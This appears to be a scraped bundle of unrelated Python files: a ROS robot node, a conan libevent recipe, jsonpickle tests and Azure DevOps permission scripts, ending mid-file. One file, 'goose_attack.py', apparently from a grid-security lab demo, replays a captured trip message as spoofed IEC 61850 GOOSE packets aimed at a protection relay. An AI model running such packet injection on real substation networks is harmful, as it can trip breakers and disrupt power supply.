# object_id_to_segs = {}
# label_to_segs = {}
# with open(semseg_filename) as f:
# data = json.losd(f)
# num_objects = len(data['segGroups'])
# for i in range(num_objects):
# object_id = data['segGroups'][i]['objectId'] + 1 # instance ids should be 1-indexed
# label = data['segGroups'][i]['label']
# segs = data['segGroups'][i]['segments']
# object_id_to_segs[object_id] = segs
# if label in label_to_segs:
# label_to_segs[label].extend(segs)
# else:
# label_to_segs[label] = segs
# os.system('unzip %s'%(os.path.join(data_path, house_name, 'region_segmentations.zip')))
|
netlabcode/demo-2021 | goose_attack.py | from scapy.all import *
import os
import binascii
#targeting folder and file pcap
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
my_file = os.path.join(THIS_FOLDER, '9bus_trip.pcap')
#MAC Address references
#source = {'siemens1': "b4:b1:5a:05:30:6d",'siemens2':"b4:b1:5a:05:30:61",'alstom':"80:b3:2a:0c:23:76"}
#dest={'siemens1': "01:0c:cd:01:00:01", 'siemens2':"01:0c:cd:01:00:00",'alstom':"01:0c:cd:01:00:20"}
source = {'UKgrid1': "80:b3:2a:0c:6d:7a",'UKgrid2': "80:b3:2a:0c:23:76",'RTDS':"00:50:c2:4f:9a:2b",'Siemens1': "b4:b1:5a:05:30:6d",'IEC1': "01:0c:cd:01:00:01", 'IEC2':"01:0c:cd:01:00:00",'Alstom':"01:0c:cd:01:00:20"}
dest= {'UKgrid1': "80:b3:2a:0c:6d:7a",'UKgrid2': "80:b3:2a:0c:23:76",'RTDS':"00:50:c2:4f:9a:2b",'Siemens1': "b4:b1:5a:05:30:6d",'IEC1': "01:0c:cd:01:00:01", 'IEC2':"01:0c:cd:01:00:00",'Alstom':"01:0c:cd:01:00:20"}
#reading file pcap save as variabel pcap_data
pcap_data=rdpcap(my_file)
#get total quantity of packets in pcap file
packetq = len(pcap_data)
#print("number of packet:"+len(pcap_data))
print("Number of Packets: %s" % packetq)
print('===================================================')
# Set Sequence number
getload = list(bytes(pcap_data[0].payload))
getload[113]=1
getload[114]=195
bytesload = bytes(getload)
#loop to proces each packet
count = 0
while (count < 11):
#convert payload packet from bytes to hex
hexform=binascii.hexlify(bytesload)
print(count)
print(hexform)
print("--------")
#Create packet combination address target and payload
crafted=Ether(src=source['UKgrid2'],dst= dest['Alstom'])/bytesload
hexcrafted=binascii.hexlify(bytes(crafted))
print(count)
#set packet type
crafted.type=0x88b8
#send packet
sendp(crafted,inter=1./800,iface='Ethernet')
print("========")
#time.sleep(1)
count = count + 1
"""
x = 0
while (x < 20):
count = 19
#convert payload packet from bytes to hex
hexform=binascii.hexlify(bytes(pcap_data[count].payload))
print(count)
print(hexform)
print("--------")
#Create packet combination address target and payload
crafted=Ether(src=source['UKgrid2'],dst= dest['Alstom'])/pcap_data[count].payload
hexcrafted=binascii.hexlify(bytes(crafted))
print(hexcrafted)
#set packet type
crafted.type=0x88b8
#send packet
sendp(crafted,inter=1./800,iface='Ethernet')
x = x + 1
print("========")
""" |
Zinnion/conan-libevent | build.py | <reponame>Zinnion/conan-libevent
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bincrafters import build_template_default
import platform
if __name__ == "__main__":
builder = build_template_default.get_builder(pure_c=True)
if platform.system() == "Windows":
for settings, options, env_vars, build_requires, reference in reversed(builder.items):
builder.add(settings, {"libevent:with_openssl": False}, env_vars, build_requires)
builder.run()
|
Zinnion/conan-libevent | conanfile.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
from conans import ConanFile, AutoToolsBuildEnvironment, RunEnvironment, tools
from conans.errors import ConanInvalidConfiguration
class LibeventConan(ConanFile):
name = "libevent"
version = "2.1.9"
description = "libevent - an event notification library"
topics = ("conan", "libevent", "event")
url = "https://github.com/zinnion/conan-libevent"
homepage = "https://github.com/libevent/libevent"
author = "Zinnion <<EMAIL>>"
license = "BSD-3-Clause"
exports = ["LICENSE.md"]
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False],
"fPIC": [True, False],
"with_openssl": [True, False],
"disable_threads": [True, False]}
default_options = {"shared": False,
"fPIC": True,
"with_openssl": True,
"disable_threads": False}
_source_subfolder = "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
del self.settings.compiler.libcxx
if self.settings.os == "Windows" and \
self.options.shared:
raise ConanInvalidConfiguration("libevent does not support shared on Windows")
if self.options.with_openssl and self.options.shared:
# static OpenSSL cannot be properly detected because libevent picks up system ssl first
# so enforce shared openssl
os.environ['OPENSSL_ROOT_DIR'] = self.deps_cpp_info["OpenSSL"].rootpath
self.output.warn("Enforce shared OpenSSL for shared build")
self.options["OpenSSL"].shared = self.options.shared
#def requirements(self):
#if self.options.with_openssl:
# self.requires.add("OpenSSL/1.1.1b@zinnion/stable")
def source(self):
checksum = "eeb4c6eb2c4021e22d6278cdcd02815470243ed81077be0cbd0f233fa6fc07e8"
tools.get("{0}/releases/download/release-{1}-beta/libevent-{1}-beta.tar.gz".format(self.homepage, self.version), sha256=checksum)
extracted_folder = "libevent-{0}-beta".format(self.version)
os.rename(extracted_folder, self._source_subfolder)
def imports(self):
# Copy shared libraries for dependencies to fix DYLD_LIBRARY_PATH problems
#
# Configure script creates conftest that cannot execute without shared openssl binaries.
# Ways to solve the problem:
# 1. set *LD_LIBRARY_PATH (works with Linux with RunEnvironment
# but does not work on OS X 10.11 with SIP)
# 2. copying dylib's to the build directory (fortunately works on OS X)
if self.settings.os == "Macos":
self.copy("*.dylib*", dst=self._source_subfolder, keep_path=False)
def build(self):
if self.settings.os == "Linux" or self.settings.os == "Macos":
autotools = AutoToolsBuildEnvironment(self)
env_vars = autotools.vars.copy()
# required to correctly find static libssl on Linux
if self.options.with_openssl and self.settings.os == "Linux":
env_vars['OPENSSL_LIBADD'] = '-ldl'
# disable rpath build
tools.replace_in_file(os.path.join(self._source_subfolder, "configure"), r"-install_name \$rpath/", "-install_name ")
# compose configure options
configure_args = []
if not self.options.shared:
configure_args.append("--disable-shared")
configure_args.append("--enable-openssl" if self.options.with_openssl else "--disable-openssl")
if self.options.disable_threads:
configure_args.append("--disable-thread-support")
with tools.environment_append(env_vars):
with tools.chdir(self._source_subfolder):
# set LD_LIBRARY_PATH
with tools.environment_append(RunEnvironment(self).vars):
autotools.configure(args=configure_args)
autotools.make()
elif self.settings.os == "Windows":
vcvars = tools.vcvars_command(self.settings)
suffix = ''
if self.options.with_openssl:
suffix = "OPENSSL_DIR=" + self.deps_cpp_info['OpenSSL'].rootpath
# add runtime directives to runtime-unaware nmakefile
tools.replace_in_file(os.path.join(self._source_subfolder, "Makefile.nmake"),
'LIBFLAGS=/nologo',
'LIBFLAGS=/nologo\n'
'CFLAGS=$(CFLAGS) /%s' % str(self.settings.compiler.runtime))
# do not build tests. static_libs is the only target, no shared libs at all
make_command = "nmake %s -f Makefile.nmake static_libs" % suffix
with tools.chdir(self._source_subfolder):
self.run("%s && %s" % (vcvars, make_command))
def package(self):
self.copy("LICENSE", src=self._source_subfolder, dst="licenses", ignore_case=True, keep_path=False)
self.copy("*.h", dst="include", src=os.path.join(self._source_subfolder, "include"))
if self.settings.os == "Windows":
self.copy("event-config.h", src=os.path.join(self._source_subfolder, "WIN32-Code", "nmake", "event2"), dst="include/event2")
self.copy("tree.h", src=os.path.join(self._source_subfolder, "WIN32-Code"), dst="include")
self.copy(pattern="*.lib", dst="lib", keep_path=False)
for header in ['evdns', 'event', 'evhttp', 'evrpc', 'evutil']:
self.copy(header+'.h', dst="include", src=self._source_subfolder)
if self.options.shared:
if self.settings.os == "Macos":
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
else:
self.copy(pattern="*.so*", dst="lib", keep_path=False)
else:
self.copy(pattern="*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
if self.settings.os == "Linux":
self.cpp_info.libs.extend(["rt"])
if self.settings.os == "Windows":
self.cpp_info.libs.append('ws2_32')
if self.options.with_openssl:
self.cpp_info.defines.append('EVENT__HAVE_OPENSSL=1')
|
zhl017/omiyage | Documents/cancel_goal.py | <filename>Documents/cancel_goal.py<gh_stars>0
#!/usr/bin/env python
import rospy
from std_msgs.msg import String
from actionlib_msgs.msg import GoalID
class cancel_goal():
def __init__(self):
self.is_cancel = False
self.goal = GoalID()
self.sub_yolo = rospy.Subscriber('/yolov5', String, self.cbyolo, queue_size = 1)
self.pub_cancel_goal = rospy.Publisher('/move_base/cancel', GoalID, queue_size = 1)
rospy.loginfo('Waiting for yolo data.....')
loop_rate = rospy.Rate(15)
while not rospy.is_shutdown():
if self.is_cancel:
self.cancel()
loop_rate.sleep()
def cbyolo(self, msg):
# rospy.loginfo(rospy.get_caller_id() + ' %s', msg.data)
self.is_cancel = True
def cancel(self):
rospy.loginfo("Cancel Goal.....")
self.pub_cancel_goal.publish(GoalID())
self.is_cancel = False
if __name__ == '__main__':
rospy.init_node('cancel_goal')
node = cancel_goal()
node.main() |
zhl017/omiyage | Documents/turtlebot3_manipulator_demo.py | #!/usr/bin/env python3
import sys
import rospy
import moveit_commander
class manipulator():
def __init__(self):
moveit_commander.roscpp_initialize(sys.argv)
self.group = moveit_commander.MoveGroupCommander("arm")
self.group1 = moveit_commander.MoveGroupCommander("gripper")
rate = rospy.Rate(10)
while not rospy.is_shutdown():
self.process()
rate.sleep()
def control_gripper(self, onoff):
joint = self.group1.get_current_joint_values()
# rospy.loginfo(joint)
if onoff:
joint[0] = 0.01 # open
else:
joint[0] = 0 # close
self.group1.go(joint, wait=True)
self.group1.stop()
def control_arm(self, j1, j2, j3, j4):
joint = self.group.get_current_joint_values()
# rospy.loginfo(joint)
# rad
joint[0] = j1
joint[1] = j2
joint[2] = j3
joint[3] = j4
self.group.go(joint, wait=True)
self.group.stop()
def process(self):
# pose 1
self.control_arm(0.0, -1.0, 0.3, 0.7)
# pose 2
self.control_arm(0.0, 0.6, 0.1, -0.7)
# tool close
self.control_gripper(False)
# pose 1
self.control_arm(0.0, -1.0, 0.3, 0.7)
# pose 2
self.control_arm(0.7, 0.6, 0.1, -0.7)
# tool close
self.control_gripper(True)
if __name__ == '__main__':
rospy.init_node('turtlebot3_manipulator_demo')
node = manipulator()
node.main() |
misantroop/jsonpickle | tests/stdlib_test.py | <reponame>misantroop/jsonpickle
# -*- coding: utf-8 -*-
"""Test miscellaneous objects from the standard library"""
import uuid
import unittest
import jsonpickle
class UUIDTestCase(unittest.TestCase):
def test_random_uuid(self):
u = uuid.uuid4()
encoded = jsonpickle.encode(u)
decoded = jsonpickle.decode(encoded)
expect = u.hex
actual = decoded.hex
self.assertEqual(expect, actual)
def test_known_uuid(self):
expect = '28b56adbd18f44e2a5556bba2f23e6f6'
exemplar = uuid.UUID(expect)
encoded = jsonpickle.encode(exemplar)
decoded = jsonpickle.decode(encoded)
actual = decoded.hex
self.assertEqual(expect, actual)
class BytesTestCase(unittest.TestCase):
def test_bytestream(self):
expect = (b'\x89HDF\r\n\x1a\n\x00\x00\x00\x00\x00\x08\x08\x00'
b'\x04\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xffh'
b'\x848\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff'
b'\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00'
b'\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00'
b'\x00\x88\x00\x00\x00\x00\x00\x00\x00\xa8\x02\x00'
b'\x00\x00\x00\x00\x00\x01\x00\x01\x00')
encoded = jsonpickle.encode(expect)
actual = jsonpickle.decode(encoded)
self.assertEqual(expect, actual)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(UUIDTestCase))
suite.addTest(unittest.makeSuite(BytesTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
misantroop/jsonpickle | tests/helper.py | import unittest
class SkippableTest(unittest.TestCase):
def skip(self, msg):
if hasattr(self, 'skipTest'):
return self.skipTest(msg)
return None
|
misantroop/jsonpickle | tests/datetime_test.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 <NAME> <<EMAIL>>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
import unittest
import datetime
import time
import jsonpickle
from jsonpickle import tags
class ObjWithDate(object):
def __init__(self):
ts = datetime.datetime.now()
self.data = dict(a='a', ts=ts)
self.data_ref = dict(b='b', ts=ts)
# UTC implementation from Python 2.7 docs
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return datetime.timedelta()
def tzname(self, dt):
return 'UTC'
def dst(self, dt):
return datetime.timedelta()
utc = UTC()
class TimestampedVariable(object):
def __init__(self, value=None):
self._value = value
self._dt_read = datetime.datetime.utcnow()
self._dt_write = self._dt_read
def get(self, default_value=None):
if self._dt_read is None and self._dt_write is None:
value = default_value
self._value = value
self._dt_write = datetime.datetime.utcnow()
else:
value = self._value
self._dt_read = datetime.datetime.utcnow()
return value
def set(self, new_value):
self._dt_write = datetime.datetime.utcnow()
self._value = new_value
def __repr__(self):
dt_now = datetime.datetime.utcnow()
td_read = dt_now - self._dt_read
td_write = dt_now - self._dt_write
s = '<TimestampedVariable>\n'
s += ' value: ' + str(self._value) + '\n'
s += ' dt_read: ' + str(self._dt_read) + ' (%s ago)' % td_read + '\n'
s += ' dt_write: ' + str(self._dt_write) + ' (%s ago)' % td_write + '\n'
return s
def erasable(self, td=datetime.timedelta(seconds=1)):
dt_now = datetime.datetime.utcnow()
td_read = dt_now - self._dt_read
td_write = dt_now - self._dt_write
return td_read > td and td_write > td
class PersistantVariables(object):
def __init__(self):
self._data = {}
def __getitem__(self, key):
return self._data.setdefault(key, TimestampedVariable(None))
def __setitem__(self, key, value):
return self._data.setdefault(key, TimestampedVariable(value))
def __repr__(self):
return str(self._data)
class DateTimeInnerReferenceTestCase(unittest.TestCase):
def test_object_with_inner_datetime_refs(self):
pvars = PersistantVariables()
pvars['z'] = 1
pvars['z2'] = 2
pickled = jsonpickle.encode(pvars)
obj = jsonpickle.decode(pickled)
# ensure the references are valid
self.assertTrue(obj['z']._dt_read is obj['z']._dt_write)
self.assertTrue(obj['z2']._dt_read is obj['z2']._dt_write)
# ensure the values are valid
self.assertEqual(obj['z'].get(), 1)
self.assertEqual(obj['z2'].get(), 2)
# ensure get() updates _dt_read
self.assertTrue(obj['z']._dt_read is not obj['z']._dt_write)
self.assertTrue(obj['z2']._dt_read is not obj['z2']._dt_write)
class DateTimeSimpleTestCase(unittest.TestCase):
def _roundtrip(self, obj):
"""
pickle and then unpickle object, then assert the new object is the
same as the original.
"""
pickled = jsonpickle.encode(obj)
unpickled = jsonpickle.decode(pickled)
self.assertEqual(obj, unpickled)
def test_datetime(self):
"""
jsonpickle should pickle a datetime object
"""
self._roundtrip(datetime.datetime.now())
def test_date(self):
"""
jsonpickle should pickle a date object
"""
self._roundtrip(datetime.datetime.today())
def test_time(self):
"""
jsonpickle should pickle a time object
"""
self._roundtrip(datetime.datetime.now().time())
def test_timedelta(self):
"""
jsonpickle should pickle a timedelta object
"""
self._roundtrip(datetime.timedelta(days=3))
def test_utc(self):
"""
jsonpickle should be able to encode and decode a datetime with a
simple, pickleable UTC tzinfo.
"""
self._roundtrip(datetime.datetime.utcnow().replace(tzinfo=utc))
def test_unpickleable(self):
"""
If 'unpickleable' is set on the Pickler, the date objects should be
simple, human-readable strings.
"""
obj = datetime.datetime.now()
pickler = jsonpickle.pickler.Pickler(unpicklable=False)
flattened = pickler.flatten(obj)
self.assertEqual(str(obj), flattened)
def test_object_with_datetime(self):
test_obj = ObjWithDate()
json = jsonpickle.encode(test_obj)
test_obj_decoded = jsonpickle.decode(json)
self.assertEqual(test_obj_decoded.data['ts'],
test_obj_decoded.data_ref['ts'])
class DateTimeAdvancedTestCase(unittest.TestCase):
def setUp(self):
self.pickler = jsonpickle.pickler.Pickler()
self.unpickler = jsonpickle.unpickler.Unpickler()
def tearDown(self):
self.pickler.reset()
self.unpickler.reset()
def test_struct_time(self):
expect = time.struct_time([1, 2, 3, 4, 5, 6, 7, 8, 9])
json = jsonpickle.encode(expect)
actual = jsonpickle.decode(json)
self.assertEqual(type(actual), time.struct_time)
self.assertEqual(expect, actual)
def test_struct_time_chars(self):
expect = time.struct_time('123456789')
flattened = self.pickler.flatten(expect)
actual = self.unpickler.restore(flattened)
self.assertEqual(expect, actual)
def test_datetime_structure(self):
obj = datetime.datetime.now()
flattened = self.pickler.flatten(obj)
self.assertTrue(tags.OBJECT in flattened)
self.assertTrue('__reduce__' in flattened)
inflated = self.unpickler.restore(flattened)
self.assertEqual(obj, inflated)
def test_datetime_inside_int_keys_defaults(self):
t = datetime.time(hour=10)
s = jsonpickle.encode({1: t, 2: t})
d = jsonpickle.decode(s)
self.assertEqual(d["1"], d["2"])
self.assertTrue(d["1"] is d["2"])
self.assertTrue(isinstance(d["1"], datetime.time))
def test_datetime_inside_int_keys_with_keys_enabled(self):
t = datetime.time(hour=10)
s = jsonpickle.encode({1: t, 2: t}, keys=True)
d = jsonpickle.decode(s, keys=True)
self.assertEqual(d[1], d[2])
self.assertTrue(d[1] is d[2])
self.assertTrue(isinstance(d[1], datetime.time))
def test_datetime_repr_not_unpicklable(self):
obj = datetime.datetime.now()
pickler = jsonpickle.pickler.Pickler(unpicklable=False)
flattened = pickler.flatten(obj)
self.assertFalse(tags.REPR in flattened)
self.assertFalse(tags.OBJECT in flattened)
self.assertEqual(str(obj), flattened)
def test_datetime_dict_keys_defaults(self):
"""Test that we handle datetime objects as keys."""
datetime_dict = {datetime.datetime(2008, 12, 31): True}
pickled = jsonpickle.encode(datetime_dict)
expect = {'datetime.datetime(2008, 12, 31, 0, 0)': True}
actual = jsonpickle.decode(pickled)
self.assertEqual(expect, actual)
def test_datetime_dict_keys_with_keys_enabled(self):
"""Test that we handle datetime objects as keys."""
datetime_dict = {datetime.datetime(2008, 12, 31): True}
pickled = jsonpickle.encode(datetime_dict, keys=True)
expect = datetime_dict
actual = jsonpickle.decode(pickled, keys=True)
self.assertEqual(expect, actual)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DateTimeSimpleTestCase))
suite.addTest(unittest.makeSuite(DateTimeAdvancedTestCase))
suite.addTest(unittest.makeSuite(DateTimeInnerReferenceTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
kagarlickij/azuredevops-security-automation | onprem/create_group.py | <reponame>kagarlickij/azuredevops-security-automation
"""
This script creates group in projct via TFSSecurity cmd
"""
import subprocess
import argparse
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectId", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupDescription", type=str, required=True)
ARGS = PARSER.parse_args()
CMD = [
"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/gc",
f"vstfs:///Classification/TeamProject/{ARGS.projectId}",
f"{ARGS.groupName}",
f"{ARGS.groupDescription}",
f"/collection:{ARGS.organization}",
]
CREATE_OUTPUT = subprocess.run(CMD, check=True, stdout=subprocess.PIPE).stdout.decode(
"utf-8"
)
print(f"[DEBUG] CREATE_OUTPUT: {CREATE_OUTPUT}")
|
kagarlickij/azuredevops-security-automation | common/set_permissions.py | """
This script sets ACL
"""
import json
import argparse
import sys
import os
import time
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--namespaceId", type=str, required=True)
PARSER.add_argument("--projectId", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--allow", type=str, required=True)
PARSER.add_argument("--deny", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
if ARGS.namespaceId == "2e9eb7ed-3c0a-47d4-87c1-0ffdd275fd87":
print("[INFO] Git namespace, adding `repoV2` to token..")
TOKEN = f"repoV2/{ARGS.projectId}"
elif ARGS.namespaceId == "52d39943-cb85-4d7f-8fa8-c6baac873819":
print(
"[INFO] Project namespace, adding `$PROJECT:vstfs:///Classification/TeamProject` to token.."
)
TOKEN = f"$PROJECT:vstfs:///Classification/TeamProject/{ARGS.projectId}"
elif ARGS.namespaceId == "d34d3680-dfe5-4cc6-a949-7d9c68f73cba":
print("[INFO] Analytics namespace, adding `$/Shared` to token..")
TOKEN = f"$/Shared/{ARGS.projectId}"
elif ARGS.namespaceId == "b7e84409-6553-448a-bbb2-af228e07cbeb":
print("[INFO] Library namespace, adding `Library/` to token..")
TOKEN = f"Library/{ARGS.projectId}"
else:
print("[INFO] standart format for token")
TOKEN = f"{ARGS.projectId}"
SID = os.environ[(ARGS.groupSid).upper()]
time.sleep(1)
URL = "{}/_apis/accesscontrollists/{}?token={}&api-version=5.0".format(
ARGS.organization, ARGS.namespaceId, TOKEN
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_ACL = RESPONSE.json()
ACE = {
"descriptor": f"Microsoft.TeamFoundation.Identity;{SID}",
"allow": f"{ARGS.allow}",
"deny": f"{ARGS.deny}",
}
if CURRENT_ACL["count"] == 0:
ACCESS_DICT = {f"Microsoft.TeamFoundation.Identity;{SID}": ACE}
else:
ACCESS_DICT = CURRENT_ACL["value"][0]["acesDictionary"]
ACCESS_DICT[f"Microsoft.TeamFoundation.Identity;{SID}"] = ACE
DESIRED_ACL = {
"count": 1,
"value": [
{
"inheritPermissions": "true",
"token": f"{TOKEN}",
"acesDictionary": ACCESS_DICT,
}
],
}
URL = "{}/_apis/accesscontrollists/{}?api-version=5.0".format(
ARGS.organization, ARGS.namespaceId
)
HEADERS = {
"Content-Type": "application/json",
}
print(f"[INFO] Setting permissions for {ARGS.groupName} group..")
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DESIRED_ACL), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 204:
print(
f"[INFO] Permissions for {ARGS.groupName} group have been set successfully"
)
else:
print(
f"##vso[task.logissue type=error] Permissions for {ARGS.groupName} group have not been set successfully"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/generate_pylint_badge.py | """
This script generates pylint badge that is used in README.md
"""
import subprocess
import sys
import json
import argparse
import os
import requests
import anybadge
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--gistId", type=str, required=True)
PARSER.add_argument("--gitHubPat", type=str, required=True)
ARGS = PARSER.parse_args()
PYLINT_CMD = ["pylint --exit-zero ./**/*.py"]
PYLINT_OUTPUT = subprocess.run(
PYLINT_CMD, check=True, stdout=subprocess.PIPE, shell=True
).stdout.decode("utf-8")
PYLINT_SCORE = PYLINT_OUTPUT.split("at ", 1)[1].split("/", 1)[0]
print(f"[INFO] PYLINT_SCORE: {PYLINT_SCORE}")
ANYBADGE_THRESHOLDS = {2: "red", 4: "orange", 6: "yellow", 10: "green"}
BADGE = anybadge.Badge("pylint", PYLINT_SCORE, thresholds=ANYBADGE_THRESHOLDS)
BADGE.write_badge("pylint.svg")
SVG = open("pylint.svg", "r")
SVG_READ = SVG.read()
URL = "https://api.github.com/gists/{}".format(ARGS.gistId)
HEADERS = {"Authorization": f"token {ARGS.gitHubPat}"}
DATA = {
"description": "Created via API",
"files": {"pylint.svg": {"content": f"{SVG_READ}"}},
}
try:
RESPONSE = requests.patch(URL, headers=HEADERS, data=json.dumps(DATA))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
print("[INFO] SVG badge has been pushed to Gist successfully")
os.remove("pylint.svg")
|
kagarlickij/azuredevops-security-automation | cloud/export_project_info.py | """
This script gets and exports Project ID and projectScopeDescriptor of the Azure DevOps project
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "https://dev.azure.com/{}/_apis/projects?api-version=5.0".format(
ARGS.organization
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
PROJECT_LIST = RESPONSE.json()["value"]
for PROJECT in PROJECT_LIST:
if PROJECT["name"] == ARGS.projectName:
PROJECT_ID = PROJECT["id"]
break
try:
PROJECT_ID
except NameError:
print("[ERROR] projectId has not been obtained")
sys.exit(1)
else:
print(f"[INFO] projectId = {PROJECT_ID}")
print(f"##vso[task.setvariable variable=projectId]{PROJECT_ID}")
URL = "https://vssps.dev.azure.com/{}/_apis/graph/descriptors/{}?api-version=5.0-preview.1".format(
ARGS.organization, PROJECT_ID
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
PROJECT_SCOPE_DESCRIPTOR = RESPONSE.json()["value"]
try:
PROJECT_SCOPE_DESCRIPTOR
except NameError:
print("[ERROR] projectScopeDescriptor has not been obtained")
sys.exit(1)
else:
print(f"[INFO] projectScopeDescriptor = {PROJECT_SCOPE_DESCRIPTOR}")
print(
f"##vso[task.setvariable variable=projectScopeDescriptor]{PROJECT_SCOPE_DESCRIPTOR}"
)
|
kagarlickij/azuredevops-security-automation | common/create_feed.py | """
This script creates new Artifact feed
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str)
PARSER.add_argument("--feedName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
if not ARGS.projectName:
print("[INFO] no projectName received, so working with on-prem API")
URL = "{}/_apis/packaging/feeds?api-version=5.0-preview.1".format(ARGS.organization)
else:
print("[INFO] projectName received, so working with cloud API")
URL = "{}/{}/_apis/packaging/feeds?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {
"name": f"{ARGS.feedName}",
"upstreamEnabled": "false",
"capabilities": "defaultCapabilities",
}
print(f"[INFO] Creating {ARGS.feedName} feed..")
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 201:
print(f"[INFO] Feed {ARGS.feedName} has been created successfully")
else:
print(
f"##vso[task.logissue type=error] Feed {ARGS.feedName} has not been created"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/set_feed_permissions.py | <filename>common/set_feed_permissions.py
"""
This script sets ACL for Artifact feed
"""
import json
import argparse
import sys
import os
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--feedId", type=str, required=True)
PARSER.add_argument("--projectName", type=str)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--role", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
SID = os.environ[(ARGS.groupSid).upper()]
if not ARGS.projectName:
print("[INFO] no projectName received, so working with on-prem API")
URL = "{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.feedId
)
else:
